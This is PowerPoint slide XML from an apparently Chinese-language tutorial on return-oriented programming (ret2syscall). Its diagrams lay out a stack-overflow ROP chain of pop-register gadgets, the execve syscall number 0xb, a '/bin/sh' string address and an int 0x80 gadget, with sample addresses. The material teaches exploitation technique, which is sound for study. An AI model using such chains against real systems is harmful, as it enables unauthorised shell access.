            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBB5AD43-7E1E-440B-845D-C88AE4C56A57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5289463" y="1642068"/>
            <a:ext cx="2061028" cy="589712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E34DED4-AB12-4048-9CBD-9F44C9BEBFD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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ret2syscall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39464157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ECE41E75-CADB-432F-BD9B-68BB2E8535DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="3011884"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFE0B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E9B83B2B-3040-4AB1-B910-66DF6FEBA992}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="3405584"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFE0B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F471B465-21BE-4265-88CF-A20EC117EDD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="3799284"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFE0B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8330787A-EBE9-44B1-97D1-4C5D4F13ACFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="4192984"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFE0B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return address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4403F34D-524A-4A67-8521-81C875F32659}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="4586684"/>
            <a:ext cx="2670924" cy="1934766"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFE0B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6E5396C4-F8ED-4107-8266-1D7885A48E45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824038" y="3011884"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FCBCB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“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” address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18C964E2-877C-4132-AC90-E433E02ACBDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824038" y="3405584"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FCBCB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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pop_ebx_ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> address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F61C535F-6CFE-419B-962B-C2F3BE7C4AAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824038" y="3799284"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FCBCB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0xb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D32B999C-9F1D-4536-89E3-972E122065E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824038" y="4192984"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FCBCB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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pop_eax_ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> address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951CE4C9-BF9B-45DC-A8C8-33956207818B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824038" y="5251450"/>
            <a:ext cx="2670924" cy="1270000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFE0B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970F0A0F-B047-4E18-9915-B81F19176B9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824038" y="4586684"/>
            <a:ext cx="2670924" cy="664766"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FCBCB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738D9AEA-7B47-4C55-9E79-841CCFBE114B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824038" y="1437084"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FCBCB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0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F2FC757D-D5C8-473A-9481-BF108561E891}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824038" y="1830784"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FCBCB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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pop_edx_ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> address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1083524A-D152-4F5E-A4D8-6590B39A3A9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824038" y="2224484"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FCBCB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0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2B42E4E0-76B9-4E7A-A906-A30E05757E19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824038" y="2618184"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FCBCB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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pop_ecx_ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> address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A5FD54C4-F70B-46A2-B829-B7FAB211D4EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824038" y="1060052"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FCBCB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int 0x80 address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E7DB867C-BE74-4C78-BB72-82B45E1EAF44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="2224484"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFE0B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F2AE09F7-22CB-4AA1-B90D-824764AC9142}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="2618184"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFE0B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19AF2669-61B0-465A-A8DA-237F6BD6AF27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="1460301"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFE0B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3F55AA98-18FD-470D-A22F-DBC4BA0A7711}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="1854001"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFE0B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CBCADDE8-1B74-4FFF-92DE-6D1F9CB8F979}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="1070768"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFE0B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9B55803E-EB92-4F4B-8A2F-43590F0EA416}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8835276" y="1373584"/>
            <a:ext cx="2670924" cy="4851400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C8E6C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4A60232A-F134-4D6D-A545-82B4CEDE2892}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8835276" y="2059185"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C5CAE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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pop_edx_ret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BD9935CC-D1AC-40C1-9810-3B7952C7F7C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8835276" y="2815034"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C5CAE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int 0x80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78587AA5-84AA-4C29-8991-220EAF893801}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8835276" y="4389834"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C5CAE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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pop_eax_ret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1E184F5E-517C-446E-B688-E4CB8DF4A296}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8835276" y="3755826"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C5CAE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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pop_ebx_ret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310BA00B-4966-4210-9BAA-4556A13CBE98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8835276" y="5554067"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C5CAE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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pop_ecx_ret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40" name="箭头: 右 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90682E4E-3467-48F3-A7A8-633024F0800E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3483724" y="3710360"/>
            <a:ext cx="1340314" cy="484632"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom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栈溢出</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="箭头: 右 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51724AA6-13F5-4EC1-ADC2-B14D7585C1B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7494962" y="3725068"/>
            <a:ext cx="1340314" cy="484632"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom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跳转执行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875318D-7877-4C4D-AAD2-6303D8558187}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1786624" y="720486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stack</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/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1849A34A-5F8A-42C6-9DDA-B515B19AC645}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5734362" y="660747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stack</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/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A35BA6B5-2F3A-45D2-BEB1-FDBDBF25DD16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9892456" y="660747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text</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/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3F794532-DA8C-4977-9DEA-1154F955B881}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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ret2syscall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="233092661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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A60232A-F134-4D6D-A545-82B4CEDE2892}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8835276" y="2059185"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C5CAE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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pop_edx_ret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BD9935CC-D1AC-40C1-9810-3B7952C7F7C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8835276" y="2815034"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C5CAE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int 0x80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78587AA5-84AA-4C29-8991-220EAF893801}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8835276" y="4389834"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C5CAE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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pop_eax_ret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1E184F5E-517C-446E-B688-E4CB8DF4A296}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8835276" y="3755826"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C5CAE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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pop_ebx_ret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310BA00B-4966-4210-9BAA-4556A13CBE98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8835276" y="5554067"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C5CAE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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pop_ecx_ret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4" name="左大括号 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5F22289-FEBC-4F5F-A9F5-2EF24E38A672}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8397025" y="2059185"/>
            <a:ext cx="438251" cy="3888582"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrac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82CB9E60-2E15-4303-B6CD-D48307518706}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6916853" y="3772643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rgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gadget</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43" name="Shape 1693">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{402B94DC-0704-487A-96A3-E8DB0FE10DC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64054" y="1592386"/>
            <a:ext cx="2157871" cy="1222648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Shape 1694">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA033AE0-987B-4ADF-A392-E99338C61B5B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64054" y="4008969"/>
            <a:ext cx="1924776" cy="1938798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Shape 1695">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05E21548-7103-4F84-831B-A23C0DBB64FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3180277" y="3454314"/>
            <a:ext cx="488877" cy="438251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6" name="Shape 1696">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{413AF540-8566-4141-A053-1B4AE2BBC78E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2364054" y="2814686"/>
            <a:ext cx="2291759" cy="4046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-US" altLang="zh-CN" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>gadget</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Shape 1697">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1568187-FA61-4DA5-9C5E-007C32EA5835}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2383305" y="5977099"/>
            <a:ext cx="2157871" cy="4046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-US" altLang="zh-CN" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ayload</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial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94200275-886D-46C4-B617-F6999460165F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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ret2syscall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="416227580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0" name="Shape 1590"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="4601917"/>
            <a:ext cx="2095200" cy="7636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0x08052318</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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591" name="Shape 1591"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="3838317"/>
            <a:ext cx="2095200" cy="7636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0x0c0c0c0c</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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592" name="Shape 1592"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="3074717"/>
            <a:ext cx="2095200" cy="7636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0x0809951f</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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593" name="Shape 1593"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="2304667"/>
            <a:ext cx="2095200" cy="7636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0x080788c1</a:t>
            </a:r>
            <a:endParaRPr sz="1867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594" name="Shape 1594"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="4778933"/>
            <a:ext cx="3581200" cy="4096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" sz="1867" kern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pop %edx; ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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595" name="Shape 1595"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="3224200"/>
            <a:ext cx="3581200" cy="4096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" sz="1867" kern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xor %eax, %eax; ret</a:t>
